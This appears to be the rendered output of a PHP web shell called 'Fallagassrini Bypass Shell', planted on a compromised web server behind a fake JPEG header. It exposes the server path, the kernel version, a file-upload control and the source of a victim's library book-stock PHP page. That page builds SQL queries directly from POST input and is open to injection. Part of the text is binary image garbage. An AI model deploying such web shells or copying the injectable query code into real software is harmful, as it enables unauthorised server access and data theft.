JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/book_stock.php

<?php include('is_autheticated.php');

$datearrival=$_POST['datearrival'];

$listname=$_POST['listname'];

$author=$_POST['author'];

$branch=$_POST['branch'];

$purchase=$_POST['purchase'];

$book=$_POST['book'];

?>

<div class="panel-body">

			              <div id="dt_example" class="table-responsive example_alt_pagination clearfix">

			                <table class="table table-condensed table-striped table-bordered pull-left" id="data-table">    

			                  <thead>

			                    <tr>
								
								  <th style="width:10%">S No</th>

			                      <th style="width:10%">Status</th>

			                      <th style="width:20%">Branch Name</th>

			                      <th style="width:15%">Book Name</th>

                                  <th style="width:15%">ISBN</th>

                                  <th style="width:20%">Available Copies</th>

			                      <th style="width:15%">Allotted Copies</th>

								  <th style="width:15%">Comments</th>

			                    </tr>

			                  </thead>

			                  <tbody>

                              

							  <?php

							 // echo "select * from book where author like '$author%' or book_name like '$book%'";

							  if($author!='' && $book!='')

							  $book_list=mysql_query("select * from book where author ='$author' and book_name = '$book'");

							  else if($author!='')

							  $book_list=mysql_query("select * from book where author like '$author%'");

							  else if($book!='')

							  $book_list=mysql_query("select * from book where book_name like '$book%'");

							 // echo "select * from book where author like '$author%'";

							  while($rows=mysql_fetch_array($book_list))

							  {

							  $book_id1=$book_id1.','.$rows['id'];

							  }

							 // echo  $book_id;

							  $book_id1=substr($book_id1,1);

							  $book_ids=explode(',',$book_id1);

							    //$book_id=mysql_fetch_row(mysql_query("select id from book where book_name='$book' order by id desc limit 0,1"));

								

								

								//$n=mysql_num_rows(mysql_query("select * from book where book_name='$book'"));

								$n=count($book_ids);

								//print_r($book_ids);

								$i=0;

								if($n==0)

								echo '<tr class="gradeA"><td colspan="7" align="center">Book Not Found</td>';

								else

								{

								//echo $book_ids[0];

								$j=0;

								while(count($book_ids)>$j)

								{

								

								 $book_id[0]=$book_ids[$j];

								

								

							    $n1=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and  branch_name='".$branch."' and status=1"));

								 $n2=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and  branch_name='".$branch."' and status=0"));

								//$book_counts=$n+$n1[0];

								$book_counts=$n1[0];

								$result=mysql_fetch_row(mysql_query("select book_name,id,isbn from book where id='".$book_id[0]."' order by id desc"));

								//$book_counts=$result[0];

								if($listname==2)

								$source=mysql_query("select * from branches where id='".$branch."'");

								else

								$source=mysql_query("select * from branches order by name ");

								$k=0;

								?>

                                

                                <?php

								while($step=mysql_fetch_array($source))

								{ $k=$k+1;

								if($step['id']==1)

								{

							//	$n=mysql_num_rows(mysql_query("select * from book where book_name='$book'"));

								$n1=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and branch_name=1  and status=1"));

								$n2=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and branch_name=1  and status=0"));

								//$book_counts=$n+$n1[0];

								$book_counts=$n2[0];

								}else

								{

								$n1=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and branch_name='".$step['id']."'  and status=1"));

								$n2=mysql_fetch_row(mysql_query("select count(*) as alloted_copy  from book_receipt where book_id='".$book_id[0]."' and branch_name='".$step['id']."'  and status=0"));

								$book_counts=$n2[0];

								

								}

								if($book_counts=='')

								$book_counts=0;

								?>

                                

                                <input type="hidden"  name="id_<?php echo $i;?>" id="id_<?php echo $i;?>" value="<?php echo $book_id[0]; ?>" />

                                <input type="hidden"  name="branch_id_<?php echo $i;?>" id="branch_id_<?php echo $i;?>" value="<?php echo $step['id'];?>" />

			                    <tr class="gradeA">
								
									<td><?php echo $k;?></td>

			                     <td>

                                 <span id="bookcopyid_<?php echo $i;?>">

                                 <input type="button" name="add_copy" value="Add Copy" onclick="bookcopy(<?php echo $i;?>);">

                                 </span>

                                 <span id="bookconfirmid_<?php echo $i;?>" style="display:none">

                                 <input type="button" name="add_confirm" value="Confirm" onclick="bookconfirm(<?php echo $i;?>);">

                                 </span>

                                 

                                 </td>

			                      <td><?php echo $step['name'];?></td>

                                  

                                  

                                  

			                      <td><?php echo $result[0]; ?></td>

                                  <td><?php echo $result[2];?></td>

			                      <td>

								  <?php echo $book_counts; ?>

                                  <td>

                                  <span id="allot_copy_<?php echo $i;?>">

								     <?php

									  $res_id=0;

									  $old_alloted_copy=0;

									 

									 if($n2[0]=='')

									 {

                                     echo '0';

									 $res_id=0;

									 $old_alloted_copy=0;

									 }

									 else

									 {

									 echo $n2[0];

									 

									 $a_id=mysql_fetch_row(mysql_query("select id,alloted_copy,comments  from book_allotment where book_id='".$book_id[0]."' and  branch_id='".$step['id']."'"));                                if($a_id[0]!='')

									 {

									  $res_id=$a_id[0];

									  $old_alloted_copy=$a_id[1];
									  
									  $comm=$a_id[2];

									 } 

									 }

									 ?>

                                  </span>

                                  <input type="hidden" name="book_allotment_id_<?php echo $i;?>" id="book_allotment_id_<?php echo $i;?>" value="<?php echo $res_id;?>"/>

                                  <input type="hidden" name="old_alloted_copy_<?php echo $i;?>" id="old_alloted_copy_<?php echo $i;?>" value="<?php echo $old_alloted_copy;?>"/>

                                  

                                  <span id="allot_copy_text_<?php echo $i;?>" style="display:none">

                                  <input type="text" name="allot_copy_num_<?php echo $i;?>" id="allot_copy_num_<?php echo $i;?>" value="<?php echo $old_alloted_copy;?>" />

                                  </span>

			                      </td>

			                       <td class="hidden-phone">

                                   <span id="comment_text_<?php echo $i;?>">

			                     <?php echo $comm;?>

								   </span>

                                   <span id="comments_input_<?php echo $i;?>" style="display:none">

                                   <textarea cols="20" rows="10" name="comments_<?php echo $i;?>"  id="comments_<?php echo $i;?>" style="height:55px;"></textarea>

                                   </span>

			                      </td>

			                      

			                    </tr>

			                    

			                    	<?php 

									$i=$i+1;

									

									}

									

								$j=$j+1;

								}	

									

									}

									?>

			             

			            <?php if($_GET['msg']=='deleted') { ?> <p <b style="color:#900">Deleted Successfully</p> <?php } ?>

			                  </tbody>

			                </table>

			              </div>

			            </div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net